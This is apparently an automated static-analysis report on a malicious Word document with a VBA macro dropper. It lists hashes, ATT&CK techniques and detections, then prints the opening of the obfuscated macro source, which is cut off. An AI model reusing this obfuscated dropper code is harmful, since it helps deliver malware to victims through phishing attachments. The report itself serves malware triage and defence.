Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c9e31bd57a5a8139…

MALICIOUS

Office (OLE)

Size: 286.0 KB
Created: 2019-11-05 23:44:00
Authoring application: Microsoft Office Word
First seen: 2020-02-04
MD5: 0c94bd9bf1bcd0c61bd8c3130e89a693
SHA-1: 593c9051b21263815a8438d69eaa7019b0c5c961
SHA-256: c9e31bd57a5a813960810811cf9f5d6d4e6c5ba7d8e934bdd0ccdcb60dcbb13f
Risk score: 124

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Office document containing a large VBA macro, flagged by heuristics for macro detection and GetObject calls. ClamAV identifies it as 'Doc.Dropper.Agent-7381103-0'. The VBA script appears to be heavily obfuscated but likely decodes and executes a second-stage payload, as suggested by the 'long encoded blob' heuristic and the presence of the 'macros.bas' file. The primary attack pattern is likely malicious macro execution, with an initial access vector of spearphishing attachment.

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-7381103-0 (severity: critical, id: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Dropper.Agent-7381103-0
  • VBA macros detected (severity: medium, 1 related finding, id: OLE_VBA_MACROS)
    Document contains VBA macro code
  • GetObject call (severity: high, id: OLE_VBA_GETOBJ)
    GetObject call
  • Suspicious extracted artifact (severity: info, id: EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (severity: info, id: EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 333287 bytes
SHA-256: 96c9b018aae6b878bb9ebfcb7a317ad8e90c7abe7065877a6421e9cfbab0572d
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 204 long base64-like blob(s).
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "lCdPsJndDlWfjf, 0, 0, INKEDLib, InkEdit"
Private Sub eNXGvIYOlXtCmJllrV(qCiBoNYgZmKH As String)
On Error Resume Next
Dim AtmwEjLC As String, qQqGupPlFbyDwoPEjLcjSASb As Integer, dfQsVbIfaexbK As String
Dim DuXztaUNAC As Integer
Dim KNCmSLPyWmaDGRSvXFhWIj As String
AtmwEjLC = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
dfQsVbIfaexbK = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
DuXztaUNAC = 0
For qQqGupPlFbyDwoPEjLcjSASb = 32 To 1 Step -1
DuXztaUNAC = 2 * DuXztaUNAC + Sgn(InStr(1, dfQsVbIfaexbK, Mid(InID, qQqGupPlFbyDwoPEjLcjSASb, 1), vbBinaryCompare))
If qQqGupPlFbyDwoPEjLcjSASb Mod 5 = 1 Then
KNCmSLPyWmaDGRSvXFhWIj = Mid(AtmwEjLC, DuXztaUNAC + 1, 1) + KNCmSLPyWmaDGRSvXFhWIj
DuXztaUNAC = 0
End If
Next qQqGupPlFbyDwoPEjLcjSASb
Dim pKgrvLeoaXzamQArz As String
pKgrvLeoaXzamQArz = "686d5947564b6a7" & "277756e454c474f" & "4c76476c7375455" & "84d754a6c4d6f58" & "64675446"
Dim GUARi As Boolean
GUARi = IsNull(pKgrvLeoaXzamQArz)
Dim MMHazwu As Boolean
MMHazwu = IsNull(GUARi)
Dim OzCniAEkgAy As Boolean
OzCniAEkgAy = True
Dim WrIafhihJwHjLjIhMLEIN As Long
WrIafhihJwHjLjIhMLEIN = 109740397
Dim PRVufOuJ As Integer
PRVufOuJ = 25016
Dim yNZBpgAt As Long
yNZBpgAt = 278474792
On Error Resume Next
Dim YoDTBZ As String, TpOckwDeP As Integer, PGobKivDHTFvIe As String
Dim uWAVq As Integer
Dim UXaYWsiWTwfLXivYjQoZps As String
YoDTBZ = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
PGobKivDHTFvIe = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
uWAVq = 0
For TpOckwDeP = 27 To 1 Step -1
uWAVq = 2 * uWAVq + Sgn(InStr(1, PGobKivDHTFvIe, Mid(InID, TpOckwDeP, 1), vbBinaryCompare))
If TpOckwDeP Mod 3 = 1 Then
UXaYWsiWTwfLXivYjQoZps = Mid(YoDTBZ, uWAVq + 1, 1) + UXaYWsiWTwfLXivYjQoZps
uWAVq = 0
End If
Next TpOckwDeP
Call YGkgaNyePLS
Dim ZgxHbXroSVrIMgXkumX As Boolean
ZgxHbXroSVrIMgXkumX = False
Dim JbCPkIfS As Long
JbCPkIfS = 956309142
Dim EDfSWMXgi As Long
EDfSWMXgi = 504845499
Dim PaosXic As Integer
PaosXic = 18985
Dim gsXPdudopzDsQBKDwnMyobyvr As Integer
gsXPdudopzDsQBKDwnMyobyvr = 5065
Dim LZLTKoBAkMRDwyVWyUKagJSxJ As Long
LZLTKoBAkMRDwyVWyUKagJSxJ = 361107141
End Sub
Private Function XGzxdDXPwNs(pujpaemLjmhBNBNKJ As String)
On Error Resume Next
Dim oRCFeVNZqUGwXp As String, DMdpamfQd As Integer, xffOSMFVzTEtmHlMtmNjvjOXz As String
Dim lqUBTBsCsGyXbvkERRLgm As Integer
Dim eJsnaUSkHGjfN As String
oRCFeVNZqUGwXp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
xffOSMFVzTEtmHlMtmNjvjOXz = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
lqUBTBsCsGyXbvkERRLgm = 0
For DMdpamfQd = 71 To 1 Step -1
lqUBTBsCsGyXbvkERRLgm = 2 * lqUBTBsCsGyXbvkERRLgm + Sgn(InStr(1, xffOSMFVzTEtmHlMtmNjvjOXz, Mid(InID, DMdpamfQd, 1), vbBinaryCompare))
If DMdpamfQd Mod 1 = 1 Then
eJsnaUSkHGjfN = Mid(oRCFeVNZqUGwXp, lqUBTBsCsGyXbvkERRLgm + 1, 1) + eJsnaUSkHGjfN
lqUBTBsCsGyXbvkERRLgm = 0
End If
Next DMdpamfQd
Dim GHRriQtuUjcFSkBvMhCpN As Long
GHRriQtuUjcFSkBvMhCpN = 999391069
Dim rSeoVXHYVpglvzQopWr As String
rSeoVXHYVpglvzQopWr = "715a65765" & "847755a70" & "6e5951547" & "344427967" & "4672767a"
Dim dgbNaZFnQOghXdypUMWzOmz As Integer
dgbNaZFnQOghXdypUMWzOmz = 212
Dim oRKCVVLZLb As String
oRKCVVLZLb = "704470716c6a70536a65696456697" & "3"
Dim rWckPjsenY As Integer
rWckPjsenY = 25086
Dim RHgLlI As Boolean
RHgLlI = True
Dim uFDdilqRJK As Integer
uFDdilqRJK = 4534
For WifXzytxx = 39 To 190
Debug.Print WifXzytxx
Next WifXzytxx
eNXGvIYOlXtCmJllrV ("EtEgEDOHXN")
Dim oPpcPZ As String
oPpcPZ = "6f4264577161766c6f42" & "747376446c77586c624e" & "556651"
Dim knGicwAQiQiHrcf As String
knGicwAQiQiHrcf = "6e4b4e69716f53434553584c5374556854694e6b48666d487a4a6b514c59494a4" & "4"
Dim MJniFmjulOkYJAdIaPOdOg As Long
MJniFmjulOkYJAdIaPOdOg = 691968030
Dim XUXCYIogKAHMC As Boolean
XUXCYIogKAHMC = True
Dim IFxvGFOrcOgFVuZPFG As Boolean
IFxvGFOrcOgFVuZPFG = True
End Function
Privat
... (truncated)